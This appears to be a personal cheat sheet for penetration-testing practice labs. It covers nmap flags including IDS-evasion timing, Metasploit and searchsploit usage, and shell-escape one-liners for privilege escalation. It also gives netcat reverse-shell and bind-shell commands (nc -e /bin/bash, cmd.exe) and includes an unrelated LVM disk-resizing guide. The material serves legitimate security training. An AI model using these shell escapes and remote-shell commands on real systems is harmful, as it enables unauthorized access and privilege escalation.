Here are the lists of options I mostly used during the training on HTB/VulnHub & soon on OSCP labs.

NMAP

Identify

  • -O : the OS
  • -sL : the services
  • -A : Detect OS & Services
  • -sV : Standard service Detection
  • -sV --version-intensity 9: Most aggresive Service Detection (from 0->9 7 by default)
  • -sC : script scan using default set of scripts (some of them are considered intrusive)


Port selection

  • -p 22
  • -p 1-150
  • -F : 100 most common (Quick & Dirty)
  • -p- : all 65535 ports

Port scan types

  • -sT : TCP Connect Scan (Establish the connection to the 1000 common ports)
  • -sS : TCP SYN scan (default)
  • -sU -p : UDP Ports
  • -Pn : Consider host up
  • -F : only 100 most common
  • -sN : Null scan. No flags in the TCP header, very good to let hidden firewall show themselves


Templates

  • -T0 : paranoid, IDS evasion, ports scanned one at a time. 5min between each probe
  • -T1 : sneaky, IDS evasion. 15sec between each probe
  • -T2 : polite, slow down the scan to use less bandwidth & ressources, 0.4sec between each probe
  • -T3 : normal, default mode
  • -T4 : aggressive, consider we are on fast and reliable network
  • -T5 : insane, sacrifice accuracy for speed


Others useful options

  • -oA : save the output to a bunch of file (grep-able one, txt, ...)
  • -oG : save only with grep-able format
  • -iL : allow a file to be loaded to fed nmap (ex. IP list addr)
  • -badsum : send incorrect checksum, because firewall are not allowed to check the checksum, so it can help to fingerprint them


Classic scan

  • nmap -sC -sV -oA nmap/output-file <TARGET-IP> -p-


NSE Scripts

NSE scripts run after the port scanning & OS detection are finished. This is particulary useful to automate nmap scan (lua language).
* nmap -p80 TARGET-IP --script="http-\*": scan on port 80, then nmap will execute all the NSE script against this host, where the script-name begin with "http-"
* nmap --script-updatedb: keep the NSE database up to date *nmap --script "broadcast-\*" TARGET-LAN: apply NSE broadcast script on each host discovered


Shell escape

TO DO: Insert here some intro/explanation, we are not sauvage people
awk: awk 'BEGIN {system("/bin/bash")}'
bash: /bin/sh -i
find: find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}';
less/man/more: !bash
lua: os.execute('/bin/sh')
nmap: !sh
--interactive
echo "os.execute('/bin/sh')" > exploit.nse
sudo nmap --script=exploit.nse
perl: perl -e 'exec "/bin/bash";'
python: python -c 'import pty; pty.spawn("/bin/bash")'
vi/vim: :!bash
:set shell=/bin/bash:shell


Metasploit

Launch metasploit (and directly load script)

sudo msfconsole -x "use auxiliary/scanner/mysql/mysql_login;"

Options

msf > show options
msf > show advanced
msf > show targets
msf > show payloads


Looking for specific exploit

Absolute path /usr/share/exploitdb/xxxxxxx

root@kali-anon:~# searchsploit docker
  DC/OS Marathon UI - Docker (Metasploit) | exploits/python/remote/42134.rb
  Docker 0.11 - VMM-Container Breakout    | exploits/linux/local/33808.c
  Docker Daemon - Local Privilege Escal.  | exploits/linux/local/40394.rb
  Docker Daemon - Unprotected TCP Socket  | exploits/linux/local/42356.txt
  Docker Daemon - Unprotected TCP Socket  | exploits/python/remote/42650.rb
  Rancher Server - Docker Daemon Code Exec| exploits/linux_x86-64/remote/42964.rb


Running exploits

msf > run
msf > exploit


Modules

The tree of Metasploit modules is organized as the following:
- Payload: Code that you will be leaved on hacked systems (listeners, rootkits, ...)
- Exploits: Shellcode that takes advantage of vulnerabilities
- Post: Modules for post exploitation on hacked systems
- Nops: B0f usage
- Auxiliary: Fit in any of the others category (fuzz, scanner, DoS, ...)
- Encoders: Modules for encoding payloads to pass over AV

Searching

msf > search type:exploit platform:linux


LVM GUIDE

This is a complete guide to extend an existing partition of 250GB (LVM) then resize it to 500GB. Obviously, only for Linux systems.
Procedure will detail, the partition create, its configuration and the LVM extension.

And cover 2 exceptions too (parition larger than 2TB, and vmware 16TB+ extension).

Partition creation

Fdisk

fdisk /dev/sdb
    n    (for new)
    p    (for primary)
    1    (partition number)

Set the type

t     (for setting a partition type)
    1    (select the correct partition)
    L    (get the list)
    8e  (select LVM)
    p    (verify)
    w   (write configuration)

Configuration

Initialize the partition

pvcreate /dev/sdb1
pvdisplay => physical volume informations
pvscan => scan all supported LVM block devices

Create the Volume Group

vgcreate vg_backup /dev/sdb1

Create the Logical Volume

lvcreate --name lv_backup -l 100%FREE vg_backup
lvdisplay
...

Format the new partition

mkfs.ext4 /dev/vg_backup/lv_backup

Create mount point

mkdir /backup
mount /dev/vg_backup/lv_backup /backup
#(edit /etc/fstab configuration)

Verify

df -h
  /dev/sda2          début  fin block       8e
            821248   167772159   83475456     Linux LVM

OLD
  Device     Boot  Start       End   Sectors  Size Id Type
  /dev/sda1  *      2048    499711    497664  243M 83 Linux
  /dev/sda2       501758 125827071 125325314 59.8G  5 Extended
  /dev/sda5       501760 125827071 125325312 59.8G 8e Linux LVM

NEW
 First sector (499712-230686719, default 499712): 
  Device     Boot     Start       End   Sectors  Size Id Type
  /dev/sda1  *         2048    499711    497664  243M 83 Linux
  /dev/sda2          501758 125827071 125325314 59.8G  5 Extended
  /dev/sda3       125827072 230686719 104859648   50G 8e Linux LVM
  /dev/sda5          501760 125827071 125325312 59.8G 8e Linux LVM

LVM extension

SCSI bus rescan

Add the needed space on vSphere Client, then rescan the scsi bus

echo '1' > /sys/class/scsi_disk/0\:0\:0\:0/device/rescan
or (adapt in function of you device bus order)
echo '1' > /sys/class/scsi_disk/2\:0\:1\:0/device/rescan

Modify the partition table

fdisk -l
fdisk /dev/sdb
    d(delete the old partition table)
    1
    n(create a new one, that begins at the same spot, but end at the new end of the partition)
    p(set primary, like the first one)
    t
    1
    8e(specify once more LVM type)
    w(write conf)

Resize the partition the Physical Volume

pvresize /dev/sdb1 
  Physical volume "/dev/sdb1" changed
  1 physical volume(s) resized / 0 physical volume(s) not resized
init 6
pvresize /dev/sdb1 
partprobe -s
pvdisplay
    PV Name               /dev/sdb1
    VG Name               vg_backup
    PV Size               500.00 GiB / not usable 2.00 MiB

Resize to the full size

lvextend -l +100%FREE /dev/vg_backup/lv_backup
lvdisplay |grep Size
 LV Size                500.00 GiB

Check the old size before modifying

df -h|grep mapper
    /dev/mapper/vg1-lv001             18G  1.8G   15G  11% /
    /dev/mapper/vg_backup-lv_backup  246G   61M  234G   1% /backup

Resize the Logical Volume

resize2fs /dev/vg_backup/lv_backup

Check the new size

df -h |grep mapper
/dev/mapper/vg1-lv001             18G  1.8G   15G  11% /
/dev/mapper/vg_backup-lv_backup  493G   70M  470G   1% /backup

Exception n°1 (>=2TB partition)

For partition larger than 2TB, we cannot use fdisk, software can't
use parted instead

parted /dev/sdb
mklabel gpt
print free
mkpart data1 ext4 17.4kb 4398GB

print free
  Number  Start   End     Size    File system  Name   Flags
  1      17.4kB  4398GB  4398GB               data1

Set LVM flag

set 1 lvm on
print     (or just "p")

Create the physical volume

pvcreate  /dev/sdb1

Have done this for 4 partitions sdb sdc sdd sde (4x4To)

vgcreate vg_shares /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1
lvcreate --name lv_shares -l 100%FREE vg_shares

Exception n°2 (VMware VM > 16TB)

VMware, cannot add a new disk larger than 16TB on a VM using the vSphere Client.
Through ESX command-line you can get the VM id

[root@localhost:~] vim-cmd vmsvc/getallvms
  Vmid       Name                            File                         Guest OS      Version   Annotation
  1      office-backup   [datastore1] elkarbackup/elkarbackup.vmx       centos64Guest   vmx-11
  2      office-shares   [datastore1] office-shares/office-shares.vmx   centos64Guest   vmx-11
#<here the ID we need to modify is the n°2>

vim-cmd vmsvc/device.diskadd 2 18000000 scsi0 2 datastore1     
  device.diskadd =>
  2 =>
  18000000 => 18TB
  scsi0 => first scsi bus
  2 => second position for the disk, already one in the first position
  datastore1 => name of the datastore


NETCAT

Connect

Manually to a service

nc -v TARGET-IP PORT

Simple channel

srv: nc -nvlp PORT
cli: nc -nv TARGET-IP PORT

File transfer

receiver side: nc -nvlp PORT > file.zip
sender side: nc -nv TARGET-IP PORT < file.zip

Remote shell

Different types

There can be 2 types of remote shell:
- BIND shell: the local shell is binded on a specific tcp port
- REVERSE shell: the client open a socket, and the remote host send a shell to this socket

Reverse shell

Allow incomming connection on PORT to execute cmd.exe remotely

listener side: nc -nvlp PORT
sender side: nc -nv TARGET-IP PORT -e cmd.exe
or
sender side: nc -nv TARGET-IP PORT -e /bin/bash

Bind shell

lin srv: nc -nlv PORT -e /bin/bash
or
win srv: nc -nlv PORT -e cmd.exe
win cli: nc -nv TARGET-IP PORT


BEST TECHNICAL USAGE (for daily tasks)

My daily software usage

EMAIL: Protonmail (and PAY to help service running)

  • CLOUD: NextCloud (self hosting)
  • PASSWORD: KeePass2 download it through your package manager & set very strong password + key file
  • TERMINAL: Tmux like a real men !
  • NOTES: CherryTree (or KeepNote)
  • BROWSER: Firefox and/or Tor
  • VPN: NordVPN merge tcp + udp VPN via script when doing sensible operation
  • OFFICE: LibreOffice
  • TALK: IRC(bitchX) & MatterMost
  • VM: VirtualBox with 3 boxes (1 debian sandbox + 1 win10 + 1 kali)
  • GPS: OpenStreetMaps, only for single maping & location. Direction, visualization, traffic I always use Google Maps (offline)
  • Phone: LineageOS + VPN must be up everytime !
  • Organization: Integrated Kanban into NextCloud


Wifi
For security evidence, I will not detail all of these steps ...

  • Hidden SSID
  • Filtering by MAC Address + strong password + manual addition only by me
  • Use Enterprise WPA2 security
  • Rogue AP detection on the server
  • Test & reduce Wifi signal range
  • Email when an unknown address is seen
  • No Wifi for invite @home (people must know that you are an integrist)